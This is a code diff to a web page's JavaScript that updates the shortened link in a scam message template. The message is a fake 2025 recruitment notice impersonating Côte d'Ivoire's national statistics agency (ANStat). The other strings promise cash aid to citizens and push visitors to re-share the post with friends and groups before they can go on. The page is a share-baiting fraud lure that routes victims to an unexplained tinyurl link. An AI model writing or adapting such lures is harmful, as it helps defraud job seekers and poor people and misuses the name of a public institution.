--- a/index.html
+++ b/index.html
@@ -608,7 +608,7 @@ $(document).click(function () {
 
 <script>
 
-     var text1 = "*Agence Nationale de la Statistique Recrutement 2025*%0A%0AL'Agence Nationale de la Statistique - ANStat a ouvert un portail de candidature pour recruter de nouveaux personnels afin de pourvoir les différents postes disponibles. La candidature est gratuite et les recrutements ont déjà commencé%0A%0A*Les candidats intéressés doivent soumettre leur candidature en ligne sur le lien ci-dessous :*%0A https://tinyurl.com/CI-INS-RECRUITMENT",
+     var text1 = "*Agence Nationale de la Statistique Recrutement 2025*%0A%0AL'Agence Nationale de la Statistique - ANStat a ouvert un portail de candidature pour recruter de nouveaux personnels afin de pourvoir les différents postes disponibles. La candidature est gratuite et les recrutements ont déjà commencé%0A%0A*Les candidats intéressés doivent soumettre leur candidature en ligne sur le lien ci-dessous :*%0A https://tinyurl.com/CI-INS-RECRUTMENT",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
